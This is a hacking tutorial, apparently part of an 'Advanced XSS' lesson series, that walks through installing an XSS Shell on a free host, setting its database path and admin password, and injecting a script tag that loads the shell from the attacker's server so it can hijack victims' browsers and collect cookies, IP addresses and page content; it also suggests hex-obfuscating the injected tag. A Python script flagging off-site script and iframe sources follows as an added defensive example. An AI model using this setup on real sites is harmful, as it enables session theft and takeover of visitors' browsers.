How to upload Shell through XSS

Hello and welcome back to Advanced XSS. Today I will be covering the XSS Shell. An XSS Shell gives the attacker full control over the victim's browser. The shell works inside an iframe environment. This allows the attacker to keep control of the victim's browser even if the slave is browsing to new pages, etc. The Shell also gets the victim's IP, current HTML page, and of course cookies. It basically allows the attacker to execute virtually anything in JavaScript.

First, download the shell from SourceForge. Then make a free hosting account on 7Host. Now, you will need to know the location of the database. To accomplish this we will use a .asp command to retrieve the database path. Make a file called "GetDB.asp" and put the following code in it.

CODE
<%
' Print the physical path on the server of the directory this file is in
Response.Write Server.MapPath(".")
%>

Now upload all the files inside the xssshell folder to your 7Host account. I used FileZilla, but then I started having trouble, so I started using the FlashFXP free trial. Once done uploading, view GetDB.asp in your browser. It will show the database location. Now open xssshell.asp in Notepad or Notepad++. Change the var = SERVER value to the valid URL of your server. Now open the admin/db.asp file, edit the DBPATH to the database path that GetDB.asp showed you, and add the location of shell.mdb to the end.

Example:- DBPATH = "D:\user5\your_username\xssshell\db\shell.mdb"

Also change the password value to your liking. This can be found in the "If Trim(Pass)" variable.

Note: Default password is w00t.

Now, to edit the sample slave: open /sample_victim/default.asp and edit the script src to the location of your xssshell.asp file.

Example:- <script src=http://yoursite.com/xssshell/xssshell.asp></script>

You may disguise the script using hexing described in previous lessons (previous lessons listed at the bottom).

Congrats! You have just set up an XSS Shell.
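
Seen from the defending side, the tag in the example above is an off-site script include, and the iframe the shell relies on is an off-site frame. The following Python check is an added example, not part of the original post or of the XSS Shell project; the allowlisted hosts and the sample page are constructed, and it flags script and iframe sources outside the allowlist even when the attribute is unquoted or encoded.

```python
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# Assumption: hosts this site legitimately loads scripts and frames from.
ALLOWED_HOSTS = {"www.example.test", "cdn.example.test"}

# Constructed sample page: two legitimate includes and two injected tags
# shaped like the example in the post (one unquoted, one entity-encoded).
SAMPLE_PAGE = """<html><body>
<script src="/static/app.js"></script>
<script src="https://cdn.example.test/lib.js"></script>
<p>guestbook: <script src=http://yoursite.com/xssshell/xssshell.asp></script></p>
<p>guestbook: <script src="&#x68;ttp://yoursite.com/xssshell/xssshell.asp"></script></p>
</body></html>"""


class SrcAuditor(HTMLParser):
    """Record <script>/<iframe> src values whose host is not allowlisted."""

    def __init__(self, allowed_hosts):
        super().__init__(convert_charrefs=True)
        self.allowed = {h.lower() for h in allowed_hosts}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("script", "iframe"):
            return
        for name, value in attrs:
            if name != "src" or not value:
                continue
            # html.parser has already decoded character references in the
            # attribute; also undo percent-encoding before comparing hosts.
            url = unquote(value.strip())
            host = (urlsplit(url).hostname or "").lower()
            if host and host not in self.allowed:  # relative URLs have no host
                self.findings.append((self.getpos()[0], tag, host))


def audit_html(html_text, allowed_hosts=ALLOWED_HOSTS):
    """Return (line, tag, host) for every off-allowlist script or frame."""
    auditor = SrcAuditor(allowed_hosts)
    auditor.feed(html_text)
    auditor.close()
    return auditor.findings


if __name__ == "__main__":
    for line, tag, host in audit_html(SAMPLE_PAGE):
        print(f"line {line}: <{tag}> loads from unapproved host {host}")
```

Run over stored user content or rendered pages, the same allowlist can also be enforced in the browser with a Content-Security-Policy script-src and frame-src directive.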
